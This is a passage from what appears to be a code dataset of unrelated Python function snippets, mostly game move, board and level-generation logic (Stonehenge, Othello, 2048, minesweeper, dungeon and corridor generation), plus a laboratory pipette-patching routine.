(initial_x_sling, initial_y_sling), third_pos, 5)\n # Angle of impulse\n\n change_in_y = mouse_y_pos - initial_y_sling\n change_in_x = mouse_x_pos - initial_x_sling\n if change_in_x == 0:\n dx = 0.00000000000001\n angle = math.atan((float(change_in_y))/change_in_x)", "def move_girl(girl):\n global trainer_speed, girlcount, girl_left\n if girl_left:\n for i in girl:\n i.x -= 
trainer_speed\n i.move_speed()\n girlcount += 0.5\n girl_frame = int(girlcount) % 3\n camera.draw(girl[girl_frame])\n else:\n for i in girl:\n i.x += trainer_speed\n i.move_speed()\n girlcount += 0.5\n girl_frame = int(girlcount) % 3\n camera.draw(girl[girl_frame + 3])\n for each in girl:\n if each.x < 20:\n girl_left = False\n if each.x > 780:\n girl_left = True", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n 
if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self):\n # This block is used to move into the living room.\n if self.room_name == \"living\" or self.room_name == \"Living\":\n self.living_room()\n # This block is used to open the door.\n elif self.room_name == \"Door\" or self.room_name == \"door\":\n self.door()\n # This block is used to move into the kitchen.\n elif self.room_name == \"Kitchen\" or self.room_name == \"kitchen\":\n self.kitchen()\n # This block is used to move into the hallway.\n elif self.room_name == \"Hallway\" or self.room_name == \"hallway\":\n self.hallway()\n # This block is used to move into the bathroom.\n elif self.room_name == \"Bathroom\" or self.room_name == \"bathroom\":\n self.bathroom()\n # This block is used to move into the basement.\n elif self.room_name == \"Basement\" or self.room_name == \"basement\":\n self.basement()\n # This block is used to move into the bedroom.\n elif self.room_name == \"Bedroom\" or self.room_name == \"bedroom\":\n self.bedroom()\n # This block is used to move into the attic.\n elif self.room_name == \"Attic\" or \"attic\":\n self.attic()", "def grow_fungi(self, wall):\n if self.direction == 1:\n ledge_fungus = FirstLedge(self.rect.centery, self.room, wall, 'right')\n self.room.can_climb.add(ledge_fungus)\n else:\n ledge_fungus = FirstLedge(self.rect.centery, self.room, wall, 'left')\n self.room.can_climb.add(ledge_fungus)", "def new_tile(self):\n while True:\n random_row = random.randrange(self._grid_height)\n random_column = random.randrange(self._grid_width)\n if self._grid[random_row][random_column] == 0:\n self._grid[random_row][random_column] = random.choice([2] * 9 + [4])\n break", "def make_move(self, request):\n\n player = Player.query(Player.name == request.player_name).get()\n\n \"\"\"we validate that the player is in the Data Base\"\"\"\n if not player:\n raise endpoints.NotFoundException('player not found')\n\n game = gameutils.get_by_urlsafe(request.urlsafe_key, Game)\n \"\"\"we validate that the game where we want to create the board exists\"\"\"\n if not game:\n raise endpoints.NotFoundException(\n 'Game not found in the DB, please start a new game')\n\n board = Board.query(Board.key == player.board).get()\n \"\"\"we validate that the board where we want to create the board exists\"\"\"\n if not board:\n raise endpoints.NotFoundException('board not found')\n\n \"\"\"we validate that the board of the player is active, the player can't create\n multiple boards for the same Game\"\"\"\n if not player.board and not player.board_active:\n raise endpoints.ConflictException(\n 'This player has already an empty board have already a board')\n\n if player.board != board.key:\n raise endpoints.ConflictException('the board for this player is not the proper')\n\n if not gameutils.valid_target_pointed(request.x_position, request.y_position):\n raise endpoints.ConflictException('the targeted position is not ok')\n\n\n try:\n result = gameutils.search_in_board(board, request.x_position, request.y_position)\n\n if result == \"error\":\n raise endpoints.ConflictException('there is a problem with the BOARD')\n else:\n score = Score.query(Score.player_name == player.name, Score.board == board, Score.game == game)\n board.add_target(request.x_position, request.y_position)\n 
game.add_move_to_history(request.x_position, request.y_position, player.name)\n message = score.target_hitted(player,request.x_position, request.y_position, board, game)\n if score.check_if_win():\n message = \"You sunk the last Boat, you win!!!\"\n board.deactivate()\n return StringMessage(message=message)\n\n except ValueError:\n raise endpoints.BadRequestException('please verify the information ')", "def __init__(self, _pendown=1, gridmode=False, gridsize=50, homeX = 50 + 25 + 5, homeY = 50 + 25 + 5, canvWidth = 400, canvHeight = 200, \\\n turtleMainColor=\"#00A651\", turtleAccentColor=\"#FFF600\", speed = 5, rotspeed = 5, pencolor = 'red', penwidth=3):\n self._turtleMainColor = turtleMainColor\n self._turtleAccentColor = turtleAccentColor\n self._speed = speed\n self._rotspeed = rotspeed\n self._pendown = _pendown\n self._pencolor = pencolor\n self._penwidth = penwidth\n self._rotation = 90\n self._gridsize = gridsize\n self._gridmode = gridmode\n \n if(gridmode and homeX == 80):\n homeX = 0\n homeY = 0\n \n self._x = homeX\n self._y = homeY\n self._homeX = homeX\n self._homeY = homeY\n \n self._canvWidth = canvWidth\n self._canvHeight = canvHeight\n self._actions = []\n self._levelDataString = [] \n \n self._walls = []\n self._lava = []\n \n self._appendCurrentState();", "def regenerate(self, random_state):\n # Resize the entire corridor first.\n super(GapsCorridor, self).regenerate(random_state)\n\n # Move the ground plane down and make it invisible.\n self._ground_plane.pos = [self._current_corridor_length / 2, 0, -10]\n self._ground_plane.rgba = [0, 0, 0, 0]\n\n # Clear the existing platform pieces.\n self._ground_body.geom.clear()\n\n # Make the first platform larger.\n platform_length = 3. * _CORRIDOR_X_PADDING\n platform_pos = [\n platform_length / 2,\n 0,\n -_WALL_THICKNESS,\n ]\n platform_size = [\n platform_length / 2,\n self._current_corridor_width / 2,\n _WALL_THICKNESS,\n ]\n if self._aesthetic != 'default':\n self._ground_body.add(\n 'geom',\n type='box',\n name='start_floor',\n pos=platform_pos,\n size=platform_size,\n material=self._ground_material)\n else:\n self._ground_body.add(\n 'geom',\n type='box',\n rgba=variation.evaluate(self._ground_rgba, random_state),\n name='start_floor',\n pos=platform_pos,\n size=platform_size)\n\n current_x = platform_length\n platform_id = 0\n while current_x < self._current_corridor_length:\n platform_length = variation.evaluate(\n self._platform_length, random_state=random_state)\n platform_pos = [\n current_x + platform_length / 2.,\n 0,\n -_WALL_THICKNESS,\n ]\n platform_size = [\n platform_length / 2,\n self._current_corridor_width / 2,\n _WALL_THICKNESS,\n ]\n if self._aesthetic != 'default':\n self._ground_body.add(\n 'geom',\n type='box',\n name='floor_{}'.format(platform_id),\n pos=platform_pos,\n size=platform_size,\n material=self._ground_material)\n else:\n self._ground_body.add(\n 'geom',\n type='box',\n rgba=variation.evaluate(self._ground_rgba, random_state),\n name='floor_{}'.format(platform_id),\n pos=platform_pos,\n size=platform_size)\n\n platform_id += 1\n\n # Move x to start of the next platform.\n current_x += platform_length + variation.evaluate(\n self._gap_length, random_state=random_state)", "def move(self, direction, cycles):\n\t\tself.planet.tiles[self.y][self.x].set_occupant() # set occupant to the initial tile\n\t\tif direction == \"N\": # unit vector (0, -1)\n\t\t\ty_symbol = -1\n\t\t\tx_symbol = 0\n\t\tif direction == \"S\": # unit vector (0, 1)\n\t\t\ty_symbol = 1\n\t\t\tx_symbol = 0\n\t\tif direction 
== \"W\": # unit vector (-1, 0)\n\t\t\tx_symbol = -1\n\t\t\ty_symbol = 0\n\t\tif direction == \"E\": # unit vector (1, 0)\n\t\t\tx_symbol = 1\n\t\t\ty_symbol = 0\n\t\ti = 0\n\t\twhile i < int(cycles):\n\t\t\tnext_x = self.x + x_symbol # change x coordinate\n\t\t\tnext_y = self.y + y_symbol # change y coordinate\n\t\t\tnext_x, next_y = self.spherical(next_x, next_y) # get the next tile's coordinate\n\t\t\tif self.can_move(next_x, next_y): # check whether rover can move\n\t\t\t\t#reduce battery\n\t\t\t\tif self.planet.tiles[next_y][next_x].is_shaded():\n\t\t\t\t\tself.battery -= 1\n\t\t\t\tself.x = next_x\n\t\t\t\tself.y = next_y\n\t\t\t\ttile = self.planet.tiles[next_y][next_x]\n\t\t\t\ttile.set_occupant()\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tbreak", "def patch(self, position):\n # Get the corresponding position in the pipette referential\n tip_position = self.inv_mat * position\n\n # Approaching cell 1um by 1um\n self.update_message('Approaching cell...')\n while self.withdraw_sign * (self.arm.position(0) - tip_position[0, 0]) + 3 > 0:\n # Arm is not beyond the desired position, moving\n self.arm.step_move(-self.withdraw_sign, 0)\n self.arm.wait_motor_stop([0])\n time.sleep(1)\n if self.pipette_resistance * 1.15 < self.get_resistance():\n # pipette resistance has increased: probably close to cell, wait for stablilization\n time.sleep(10)\n if self.pipette_resistance * 1.15 < self.get_resistance():\n # Resistance has not decreased, stop moving\n # Close to the cell, sealing\n self.update_message('Cell found. Sealing...')\n self.pressure.seal()\n init_time = time.time()\n self.amplifier.set_holding_enable(True)\n while (1e9 > self.get_resistance()) | (time.time() - init_time < 15):\n # Waiting for measure to increased to 1GOhm\n if time.time() - init_time < 10:\n # decrease holding to -70mV in 10 seconds\n self.amplifier.set_holding(-7 * 1e-3 * (time.time() - init_time))\n self.amplifier.set_holding_enable(True)\n if time.time() - init_time >= 90:\n # Resistance did not increased enough in 90sec: failure\n self.update_message('ERROR: Seal unsuccessful.')\n return 0\n # Seal succesfull\n self.pressure.release()\n self.update_message('Seal done.')\n return 1\n\n # Broke the loop because arm went too far without finding the cell\n self.update_message('ERROR: Could not find the cell.')\n return 0", "def __init__(self, num_rows = 4, num_cols = 4,\n first_mover = \"W\", top_left = \"B\",\n how_to_win = \">\", initial_config=[]):\n # initial_config was made for AI Othello to\n # get around pass-by-reference behavior of lists.\n if (4 > num_rows > 16) or num_rows % 2 != 0:\n raise Exception\n else:\n self._num_rows = num_rows\n if (4 > num_cols > 16) or num_cols % 2 != 0:\n raise Exception\n else:\n self._num_cols = num_cols\n if first_mover != \"B\" and first_mover != \"W\":\n raise Exception\n else:\n self._turn = first_mover\n if top_left != \"B\" and top_left != \"W\":\n raise Exception\n else:\n self._top_left = top_left\n if how_to_win != \">\" and how_to_win != \"<\":\n raise Exception\n else:\n self._how_to_win = how_to_win\n\n if initial_config == []:\n self._board = self._make_board(num_rows, num_cols, top_left)\n else:\n self._board = deepcopy(initial_config)\n \n self._game_over = False\n self._winner = \" \"\n self._tl_cell = (0, 0)\n self._tr_cell = (0, num_cols-1)\n self._bl_cell = (num_rows-1, 0)\n self._br_cell = (num_rows-1, num_cols-1)\n self._ls_cells = [(c, 0) for c in range(1, num_rows-1)]\n self._rs_cells = [(c, num_cols-1) for c in range(1, num_rows-1)]\n self._ts_cells = 
[(0, c) for c in range(1, num_cols-1)]\n self._bs_cells = [(num_rows-1, c) for c in range(1, num_cols-1)]\n #^Note how ranges start from 1 and go to num_rows-1 to avoid corners,\n #which are processed differently", "def regenerate(self, random_state):\n super(WallsCorridor, self).regenerate(random_state)\n wall_x = variation.evaluate(\n self._wall_gap, random_state=random_state) - _CORRIDOR_X_PADDING\n wall_side = 0\n wall_id = 0\n while wall_x < self._current_corridor_length:\n wall_width = variation.evaluate(\n self._wall_width, random_state=random_state)\n wall_height = variation.evaluate(\n self._wall_height, random_state=random_state)\n wall_rgba = variation.evaluate(self._wall_rgba, random_state=random_state)\n if variation.evaluate(self._swap_wall_side, random_state=random_state):\n wall_side = 1 - wall_side\n\n wall_pos = [\n wall_x,\n (2 * wall_side - 1) * (self._current_corridor_width - wall_width) / 2,\n wall_height / 2\n ]\n wall_size = [_WALL_THICKNESS / 2, wall_width / 2, wall_height / 2]\n self._walls_body.add(\n 'geom',\n type='box',\n name='wall_{}'.format(wall_id),\n pos=wall_pos,\n size=wall_size,\n rgba=wall_rgba)\n\n wall_id += 1\n wall_x += variation.evaluate(self._wall_gap, random_state=random_state)", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def calculate_random_move(self, vehicleamount, visit):\n self.depth += 1\n\n while True:\n number = (randint(0, 1))\n vehicle_id = (randint(0, vehicleamount-1))\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if number == 0:\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].x += 1\n else:\n return self\n else:\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].x -= 1\n else:\n return self\n else: #vertical\n if number == 0:\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].y += 1\n else:\n return self\n else:\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if self.get_board().tostring() in visit:\n self.vehicles[vehicle_id].y -= 1\n else:\n return self", "def generate(self, level):\n # TODO The dungeon's instances are spawned and loaded here.\n # fill map with \"blocked\" tiles\n level.maze = [[Tile(x, y, True) for y in range(level.height)] for x in range(level.width)]\n\n for r in range(level.max_rooms):\n # random width and height\n w = random.randint(level.min_room_size, level.max_room_size)\n h = random.randint(level.min_room_size, level.max_room_size)\n\n # random position without going out of the boundaries of the map\n x = random.randint(0, level.width - w - 1)\n y = random.randint(0, level.height - h - 1)\n\n # \"DungeonRoom\" class makes rectangles easier to work with\n new_room = Room(x, y, w, h)\n 
# run through the other rooms and see if they intersect with this one\n failed = False\n for other_room in level.rooms:\n if other_room is not new_room and new_room.intersect(other_room):\n failed = True\n break\n\n if not failed:\n # this means there are no intersections, so this room is valid\n\n # \"paint\" it to the map's tiles\n self._create_room(level, new_room)\n\n # center coordinates of new room, will be useful later\n new_x, new_y = new_room.center()\n\n if level.num_rooms > 0:\n # connect it to the previous room with a tunnel\n # center coordinates of previous room\n (prev_x, prev_y) = level.rooms[level.num_rooms - 1].center()\n\n # draw a coin (random number that is either 0 or 1)\n if random.randint(0, 1) == 1:\n # first move horizontally, then vertically\n self._create_h_tunnel(level, prev_x, new_x, prev_y)\n self._create_v_tunnel(level, prev_y, new_y, new_x)\n else:\n # first move vertically, then horizontally\n self._create_v_tunnel(level, prev_y, new_y, prev_x)\n self._create_h_tunnel(level, prev_x, new_x, new_y)\n\n # finally, append the new room to the list (appending here, once, keeps\n # level.rooms free of duplicates and the previous-room index correct)\n level.rooms.append(new_room)\n level.num_rooms += 1\n\n # connect them with a tunnel\n self._create_h_tunnel(level, 25, 55, 23)", "def cell_move_herbivores(self, coordinate):\n \"\"\"Moves the herbivores that should move in given cell\"\"\"\n\n right = (coordinate[0], coordinate[1] + 1)\n up = (coordinate[0] - 1, coordinate[1])\n left = (coordinate[0], coordinate[1] - 1)\n down = (coordinate[0] + 1, coordinate[1])\n\n length = len(self.cells[coordinate].herbivores)\n for _ in range(length):\n herbivore = self.cells[coordinate].herbivores.pop(0)\n\n if herbivore.migration():\n move_direction = self.get_direction(\n self.get_pi_values_herbivores(coordinate))\n if move_direction == 'right':\n self.cells[right].herbivores_new.append(herbivore)\n elif move_direction == 'up':\n self.cells[up].herbivores_new.append(herbivore)\n elif move_direction == 'left':\n self.cells[left].herbivores_new.append(herbivore)\n elif move_direction == 'down':\n self.cells[down].herbivores_new.append(herbivore)\n else:\n self.cells[coordinate].herbivores.append(herbivore)\n else:\n self.cells[coordinate].herbivores.append(herbivore)", "def update_grid(self):\n if self.game_over:\n return\n if self.active_piece is None:\n self.place_new_piece()\n if self.piece_collision_exists(self.active_piece):\n self.handle_active_piece_collision()\n self.place_new_piece()\n self.shift_cells(self.active_piece, self.current_direction)\n self.active_piece = TransformPiece.shift_coordinates(self.active_piece, self.current_direction)\n self.merge_with_completed_rows()\n if self.is_game_won():\n self.game_over = True", "def advance_board(self):\n # We can advance the board using a pretty simple convolution,\n # so we don't have to execute a lot of loops in python.\n # Of course, this probably won't be sufficient for extremely\n # large boards.\n self.num_steps += 1\n board = self.board\n cfilter = np.array([[1,1,1],[1,0,1],[1,1,1]], dtype=np.uint16)\n\n alive = board & CellTypes.alive > 0\n spawning = board & CellTypes.spawning > 0\n frozen = board & CellTypes.frozen > 0\n\n can_die = ~frozen & (\n convolve2d(board & CellTypes.preserving, cfilter) == 0)\n can_grow = ~frozen & (\n convolve2d(board & CellTypes.inhibiting, cfilter) == 0)\n\n num_neighbors = convolve2d(alive, cfilter)\n num_spawn = convolve2d(spawning, cfilter)\n spawn_prob = 1 - (1 - self.spawn_prob)**num_spawn\n has_spawned = coinflip(spawn_prob, board.shape)\n\n 
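# build boolean lookup tables indexed by live-neighbor count: born_rule for births, dead_rule for deaths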
born_rule = np.zeros(9, dtype=bool)\n born_rule[list(self.born_rule)] = True\n dead_rule = np.ones(9, dtype=bool)\n dead_rule[list(self.survive_rule)] = False\n\n new_alive = (born_rule[num_neighbors] | has_spawned) & ~alive & can_grow\n new_dead = dead_rule[num_neighbors] & alive & can_die\n\n new_flags = np.zeros_like(board)\n color_weights = 1 * alive + 2 * spawning\n for color in CellTypes.colors:\n # For each of the colors, see if there are two or more neighbors\n # that have it. If so, any new cells (whether born or spawned)\n # will also get that color.\n has_color = board & color > 0\n new_color = convolve2d(has_color * color_weights, cfilter) >= 2\n new_flags += color * new_color\n indestructible = alive & (board & CellTypes.destructible == 0)\n new_flags += CellTypes.destructible * (convolve2d(indestructible, cfilter) < 2)\n\n board *= ~(new_alive | new_dead)\n board += new_alive * (CellTypes.alive + new_flags)", "def _check_ls_corners(self, i_row, i_col, adj_opp_cells, loc):\n shift = 1 if loc == \"tl\" else -1 #either top-left or bottom-left\n opp_player = \"B\" if self._turn == \"W\" else \"W\"\n\n #Note that loc corresponds to the position of the tile to be placed.\n #Also, the indices correspond to an adjacent opposing cell to be considered.\n #The compass direction corresponds to the direction in which the adjacent opposing\n #cell will be \"entered\" by the tile to be placed.\n if self._board[i_row+shift][i_col] == opp_player: #up/down\n if loc == \"tl\":\n adj_opp_cells.append((i_row+shift, i_col, \"n\"))\n elif loc == \"bl\":\n adj_opp_cells.append((i_row+shift, i_col, \"s\")) \n if self._board[i_row+shift][i_col+1] == opp_player: #down-diag/up-diag\n if loc == \"tl\":\n adj_opp_cells.append((i_row+shift, i_col+1, \"nw\")) \n elif loc == \"bl\":\n adj_opp_cells.append((i_row+shift, i_col+1, \"sw\")) \n if self._board[i_row][i_col+1] == opp_player: #right\n adj_opp_cells.append((i_row, i_col+1, \"w\"))", "def move_girl2(girl):\n global trainer_speed, girlcount2, girl_left2\n if girl_left2:\n for i in girl:\n i.x -= trainer_speed\n i.move_speed()\n girlcount2 += 0.5\n girl_frame = int(girlcount2) % 3\n camera.draw(girl[girl_frame])\n else:\n for i in girl:\n i.x += trainer_speed\n i.move_speed()\n girlcount2 += 0.5\n girl_frame = int(girlcount2) % 3\n camera.draw(girl[girl_frame + 3])\n for each in girl:\n if each.x < 20:\n girl_left2 = False\n if each.x > 780:\n girl_left2 = True", "def move(self, direction):\n new_grid = []\n # get the indices of specific direction\n new_indices = self._grid_indices[direction]\n for cell in new_indices:\n lst = self.traversed_list(cell, direction)\n merged_list = merge(lst)\n new_grid.append(merged_list)\n \n adjusted_grid = adjust_grid(new_grid,direction)\n if self.is_changed(adjusted_grid):\n self.update_grid(adjusted_grid)\n self.new_tile()", "def make_random_move(self):\n #raise NotImplementedError\n # Take out moves_made as well as mines detected\n self.available_cells = self.available_cells - self.moves_made - self.mines\n available_cells = self.available_cells.copy()\n\n # I'll first try and see if there's any move not within the nearby of\n # The mines, I think this can maximise survivability in some cases\n # It'll still work even if didn't do the below\n for sentence in self.knowledge:\n available_cells -= sentence.cells\n #print(sentence)\n #print(self.mines)\n\n # Making a random move\n length = len(available_cells)\n if length != 0:\n index = random.randint(0, length - 1)\n move = list(available_cells)[index]\n 
self.moves_made.add(move)\n self.mark_safe(move)\n return move\n\n length = len(self.available_cells)\n if length != 0:\n index = random.randint(0, length - 1)\n move = list(self.available_cells)[index]\n self.moves_made.add(move)\n self.mark_safe(move)\n return move\n return None", "def add_spawns_outside_boss_doors(self: WWRandomizer):\n \n rooms_to_add_new_spawns_to = [\n (\"M_NewD2\", 10, TGDR, None, 11),\n #(\"kindan\", 16, TGDR, None, 13), # Already has a spawn, ID 1.\n (\"Siren\", 18, TGDR, None, 13),\n (\"sea\", 1, ACTR, 1, 56),\n (\"M_Dai\", 15, TGDR, None, 17),\n (\"kaze\", 12, TGDR, None, 13),\n ]\n \n for stage_name, room_number, chunk, layer, boss_door_index in rooms_to_add_new_spawns_to:\n new_spawn_id = 27\n \n dzs = self.get_arc(\"files/res/Stage/%s/Stage.arc\" % stage_name).get_file(\"stage.dzs\", DZx)\n dzr = self.get_arc(\"files/res/Stage/%s/Room%d.arc\" % (stage_name, room_number)).get_file(\"room.dzr\", DZx)\n \n if chunk == TGDR:\n dzx_for_door = dzs\n else:\n dzx_for_door = dzr\n \n door = dzx_for_door.entries_by_type_and_layer(chunk, layer=layer)[boss_door_index]\n spawn_dist_from_door = 200\n y_rot = door.y_rot\n if door.from_room_num != room_number and door.from_room_num != 63:\n y_rot = (y_rot + 0x8000) % 0x10000\n y_rot_degrees = y_rot * (90.0 / 0x4000)\n x_offset = math.sin(math.radians(y_rot_degrees)) * spawn_dist_from_door\n z_offset = math.cos(math.radians(y_rot_degrees)) * spawn_dist_from_door\n x_pos = door.x_pos + x_offset\n y_pos = door.y_pos\n z_pos = door.z_pos + z_offset\n \n if stage_name in [\"M_Dai\", \"kaze\"]:\n # Earth and Wind temple spawns must be in the stage instead of the room or the game will crash.\n dzx_for_spawn = dzs\n else:\n dzx_for_spawn = dzr\n \n spawns = dzx_for_spawn.entries_by_type(PLYR)\n assert len([spawn for spawn in spawns if spawn.spawn_id == new_spawn_id]) == 0\n \n new_spawn = dzx_for_spawn.add_entity(PLYR)\n new_spawn.spawn_type = 0\n new_spawn.room_num = room_number\n new_spawn.x_pos = x_pos\n new_spawn.y_pos = y_pos\n new_spawn.z_pos = z_pos\n new_spawn.y_rot = y_rot\n new_spawn.spawn_id = new_spawn_id\n \n dzx_for_spawn.save_changes()", "def make_move(self, x, y):\n player = self.get_player()\n self.__grid[y][x] = player\n\n winner, win_tiles = self.check_move(self.get_player(), x, y)\n\n self.__turns_played += 1\n\n # Check if winner has been found\n if player == winner:\n loser = MarkerType(1 - winner.value)\n self.__winner = winner\n self.__loser = loser\n self.__state = GameState.WINNER\n return GameState.WINNER, winner, loser, win_tiles\n\n # Check if board is full and tie happens\n elif self.__turns_played >= Settings.SIZE_X * Settings.SIZE_Y:\n self.__state = GameState.TIE\n return GameState.TIE, MarkerType.NONE, MarkerType.NONE, []\n\n self.__turn += 1\n return GameState.PLAYING, MarkerType.NONE, MarkerType.NONE, []", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def 
create_room(self):\n # iterate through array of room types\n rooms = []\n prob_block_5_list = []\n prob_block_6_list = []\n\n for row in self.room_type:\n for col in row:\n rooms.append(self.import_template(col))\n # iterate through rooms to fill screen\n # this number will be part of how we find location of top left corner of room\n # based on 5x5 grid of rooms\n for pos in range(25):\n # this will iterate through the number of columns in array\n # the number y will be part of how we find where to place the block on the y axis (according to pygame.draw)\n for y in range(self.blocks_per_room_y):\n # this will iterate through the number of rows in array\n # the number x will be part of how we find where to place the block on the x axis (according to pygame.draw)\n for x in range(self.blocks_per_room_x):\n # if cell is a 1 add a platform sprite\n if rooms[pos][y][x] is 1:\n #check if platform has another above it for graphics\n if rooms[pos][y - 1][x] in (0, 3, 4, 7) and y - 1 >= 0:\n # the cases checked in each of these conditionals are the basic case that check surrounding blocks\n # to see what platform we should be using, the edge cases, such as if a block is at the edge of\n # the room, in which case we need to check the neighboring room (array in this case)\n\n #check conditions to see if we are using the sprite with with rounded edges on the bottom right and top right\n if ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 0 and rooms[pos][y][x + 1] is 0 and rooms[pos][y][x - 1] is 1)\\\n or (x is self.blocks_per_room_x - 1 and y < self.blocks_per_room_y - 1 and pos < 24 and rooms[pos][y + 1][x] is 0 and rooms[pos + 1][y][0] is 0)\\\n or (y is self.blocks_per_room_y - 1 and x < self.blocks_per_room_x - 1 and pos < 20 and rooms[pos][y][x + 1] is 0):\n block = Platform(self.block_width, self.block_height, 'right', self.theme)\n #check conditionals to see if we are using the sprite with rounded edges on the bottom left and top left\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 0 and rooms[pos][y][x - 1] is 0 and rooms[pos][y][x + 1] is 1)\\\n or (x is 0 and y < self.blocks_per_room_y - 1 and pos > 0 and rooms[pos][y + 1][x] is 0 and rooms[pos - 1][y][self.blocks_per_room_x - 1] is 0) \\\n or (y is self.blocks_per_room_y - 1 and x > 0 and pos < 20 and rooms[pos][y][x - 1] is 0):\n block = Platform(self.block_width, self.block_height, 'left', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corners on top left and top right\n elif ((x + 1) < self.blocks_per_room_x and (x - 1) >= 0 and rooms[pos][y][x + 1] in (0, 3, 4) and rooms[pos][y][x - 1] in (0, 3, 4))\\\n or (x is 0 and pos > 0 and rooms[pos - 1][y][self.blocks_per_room_x - 1] in (0, 3, 4) and rooms[pos][y][x + 1] in (0, 3, 4))\\\n or (x is self.blocks_per_room_x - 1 and pos < 24 and rooms[pos + 1][y][0] in (0, 3, 4) and rooms[pos][y][x - 1] in (0, 3, 4)):\n block = Platform(self.block_width, self.block_height, 'round top', self.theme)\n #check conditionals to see if we are using the sprite with the rounded corner in the top left\n elif ((y + 1) < self.blocks_per_room_y and (x - 1) >= 0 and (x + 1) < self.blocks_per_room_x\n and rooms[pos][y + 1][x] is 1 and rooms[pos][y][x - 1] is 0 and rooms[pos][y][x + 1] is 1) \\\n or (x is 0 and y < self.blocks_per_room_y - 1 and pos > 0 and rooms[pos][y + 1][x] is 1 and rooms[pos - 1][y][self.blocks_per_room_x - 1] 
